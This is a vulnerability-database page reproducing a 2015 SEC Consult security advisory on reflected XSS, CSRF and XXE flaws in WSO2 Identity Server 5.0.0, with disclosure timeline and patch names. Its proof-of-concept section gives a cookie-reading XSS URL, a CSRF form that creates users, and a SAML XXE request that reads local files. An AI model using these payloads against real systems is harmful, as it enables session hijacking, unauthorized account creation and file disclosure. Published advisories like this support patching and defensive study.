Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WSO2 Identity Server 5.0.0 XSS / CSRF / XXE Injection

🗓️ 13 May 2015 00:00:00Reported by Wolfgang EttlingerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 58 Views

WSO2 Identity Server 5.0.0 vulnerabilities with XSS, CSRF, XXE Injectio

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
SEC Consult Vulnerability Lab Security Advisory < 20150513-0 >  
=======================================================================  
title: Multiple critical vulnerabilities  
product: WSO2 Identity Server  
other WSO2 Carbon based products may be affected too  
vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095)  
fixed version: 5.0.0 with patches 1194 and 1095 applied  
CVE number:  
impact: critical  
homepage: http://wso2.com/products/identity-server/  
found: 2015-02-19  
by: W. Ettlinger (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Berlin - Frankfurt/Main - Montreal - Singapore  
Vienna (HQ) - Vilnius - Zurich  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
- -------------------  
"WSO2 Identity Server provides sophisticated security and identity management  
of enterprise web applications, services, and APIs, and makes life easier for  
developers and architects with its hassle-free, minimal monitoring and  
maintenance requirements. In its latest version, Identity Server acts as an  
Enterprise Identity Bus (EIB) — a central backbone to connect and manage  
multiple identities regardless of the standards on which they are based."  
  
URL: http://wso2.com/products/identity-server/  
  
Business recommendation:  
- ------------------------  
The WSO2 Identity Server has three security vulnerabilities that allow an  
attacker to take over administrative user sessions and read arbitrary  
local files. Moreover, the XXE vulnerability potentially allows an  
attacker to conduct further attacks on internal servers since the  
vulnerability may allow an attacker to bypass firewall rules.  
  
SEC Consult only conducted a very quick and narrow check on the  
WSO2 Identity Server. Since in this check a critical vulnerability was  
found, SEC Consult suspects that the Identity Server contains even  
more critical vulnerabilities.  
  
Since other WSO2 products are based on the same framework (WSO2 Carbon  
Framework), it is possible that these or similar vulnerabilities affect  
other products too.  
  
SEC Consult recommends to not use any products based on the WSO2 Carbon  
Framework until a thorough security review has been conducted.  
  
  
Vulnerability overview/description:  
- -----------------------------------  
1) Reflected cross-site scripting (XSS, IDENTITY-3280)  
The WSO2 Identity Server is vulnerable to reflected reflected cross-site  
scripting vulnerabilities. An attacker can lure a victim, that is logged in  
on the Identity Server administration web interface, to e.g. click on a link  
and take over the victim's session.  
  
2) Cross-site request forgery (CSRF, IDENTITY-3280)  
On at least on one web page, CSRF protection has not been implemented. An  
attacker on the internet could lure a victim, that is logged in on the  
Identity Server administration web interface, on a web page e.g. containing  
a manipulated <img> tag. The attacker is then able to add arbitrary users  
to the Identity Server.  
  
3) XML external entitiy injection (XXE, IDENTITY-3192)  
An unauthenticated attacker can use the SAML authentication interface to  
inject arbitrary external XML entities. This allows an attacker to read  
arbitrary local files. Moreover, since the XML entity resolver allows  
remote URLs, this vulnerability may allow to bypass firewall rules  
and conduct further attacks on internal hosts.  
  
  
Proof of concept:  
- -----------------  
1) Reflected cross-site scripting (XSS, IDENTITY-3280)  
When opening the following URL an alert-box is shown as an example:  
http://<host>:9443/carbon/user/change-passwd.jsp?isUserChange=true&returnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
  
When a user without permission to create other users issues the following  
request, an alert-box is shown:  
- ---- snip ----  
POST /carbon/user/add-finish.jsp HTTP/1.1  
Host: <host>:9443  
Cookie: <cookies>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 261  
  
pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24&pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24&domain=PRIMARY&username=secconsult&passwordMethod=defineHere&password=test123&retype=test123  
- ---- snip ----  
  
2) Cross-site request forgery (CSRF, IDENTITY-3280)  
The following HTML fragment demonstrates this issue:  
- ---- snip ----  
<form method="POST" action="https://<host>:9443/carbon/user/add-finish.jsp">  
<input type="text" name="domain" value="PRIMARY"/>  
<input type="text" name="username" value="secconsult"/>  
<input type="text" name="password" value="test123"/>  
<input type="submit"/>  
</form>  
- ---- snip ----  
  
3) XML external entitiy injection (XXE, IDENTITY-3192)  
After issuing the following request to a vulnerable Windows server,  
the contents of the C: drive are returned:  
  
- ---- snip ----  
<?xml version="1.0"?>  
<!DOCTYPE AuthnRequest [  
<!ELEMENT AuthnRequest ANY >  
<!ENTITY xxe SYSTEM "file:///C:/" >]>  
<samlp:AuthnRequest  
xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"  
Destination="https://<host>/samlsso"  
ID="_ffffffff-0000-0000-0000-ffffffffffff"  
IssueInstant="2015-01-01T01:01:01Z"  
ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"  
Version="2.0">  
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">  
XXXX&xxe;YYYY  
</saml:Issuer>  
<samlp:NameIDPolicy AllowCreate="true"  
Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>  
</samlp:AuthnRequest>  
- ---- snip ----  
  
  
Vulnerable / tested versions:  
- -----------------------------  
The version 5.0.0 (with WSO2 Carbon Framework v4.2.0 patch1095 applied)  
was found to be vulnerable. This was the latest version at the time  
of discovery.  
  
  
Vendor contact timeline:  
- ------------------------  
2015-03-19: Contacting vendor through [email protected]  
2015-03-19: Security contact confirms retrieval of the E-Mail  
2015-03-19: Security contact says that he has trouble opening the attached PDF  
document  
2015-03-19: Sending Responsible Disclosure Policy in plain text  
2015-03-20: Security contact states he actually was unable to decrypt the  
advisory  
2015-03-22: Sending security advisory again  
2015-03-22: Security contact confirms retrieval of the advisory  
2015-03-26: Security contact acknowledges existence of the vulnerabilities  
2015-04-10: Asking for an update on the current status and which products and  
versions are affected  
2015-04-10: Security contact: XSS vulnerabilities are fixed in the code,  
fixing CSRF is in progress,  
Identity Server 5.0.0 is vulnerable  
2015-04-13: Asking whether the patches will be release before the latest  
possible release date; asking for the status of the XXE  
vulnerability and whether other products based on Carbon are  
affected  
2015-04-13: Advisory can be release on 2013-05-07, release notes will mention  
the affected products  
2015-05-04: Asking for current status  
2015-05-04: Security contact: patches will be released in the next couple of  
days  
2015-05-05: Security contact asks to delay the release of the advisory to  
2013-05-13  
2015-05-05: Confirming the new release date  
2015-05-05: Asking to give credit in the release notes to the patch  
2015-05-13: Public release of the advisory  
  
  
Solution:  
- ---------  
Apply the following patches to mitigate these issues:  
* WSO2-CARBON-PATCH-4.2.0-1194  
* WSO2-CARBON-PATCH-4.2.0-1095  
  
See the following pages for more information:  
https://wso2.org/jira/browse/IDENTITY-3280  
https://wso2.org/jira/browse/IDENTITY-3192  
  
The patches can be downloaded at  
http://wso2.com/products/identity-server/  
  
Workaround:  
- -----------  
None.  
  
  
Advisory URL:  
- -------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/Career.htm  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF W. Ettlinger / @2015  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
  
iQIcBAEBAgAGBQJVUx2MAAoJEC0t17XG7og/H/4QAIiwOLbldpFKkJwemTc5qxeu  
LSIgJjMy9Yz7HZtu1c65QAPJQ6B+VduU+bN3Lt10AHAWYPTtyjFlQzq4MrcUWaY8  
XiO4pA4nYykki9F8QUp1cBX9bfzihqHR/1+sqELJ/ueiz8U4wzUPW31UehTdjV26  
d+SZ0FdVPi1BlJb3Ex0ejkxkDB4a9kVYswxu0zti8oZcaXZ++TYdCssssAaA+Vu4  
aPErIQMfaXSoeZlJS7f8TYRRR9p2fVJBsXr29CgG9GJBz0DMExF8AKZ+Ve0EJd8u  
y2mKPwJgtzLN7Crw1YfD6YoSaTbygdDqFs208VDwAEP5Gh7N19ylhpUdJkgKk56l  
jzo+DmqVt9j5R2gu1Nc8+3ienuQ9v6xs5WlOWJC5/2Gh9ngOH31jEZTG2oqjLDxW  
pqsXnqG6FEW1qbbB+UCebI3bseqLGJJQQVqYeENh9zX1m82PTuRy9QQDcyXlzl4q  
hZksURglFjGwwgahTgR8LVO5kAivqbsahp/IojxSwc0DnceC8NJjYE/qprv+NOG0  
2sud3X9AhrlJcwfNMWb795Jgv2fDjox1yu8Noga67a2muz9UwbTJXZKSyn32IpEe  
aYQtgSXTT0YaidP7HDUcsuTIhGczL8PGilDCuNRDy2UF0eFHqaj1d9Ou9QSturnn  
wu/AhxURurrsfOEg1TMs  
=iuLH  
-----END PGP SIGNATURE-----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 May 2015 00:00Current
0.2Low risk
Vulners AI Score0.2
critical vulnerabilitieswso2 identity serversecurity advisoryxsscsrfxxesamlsecurity reviewcsrf protectionxml entitiesarbitrary usersreflected cross-site scriptingexternal xml entitiesfirewall bypass
58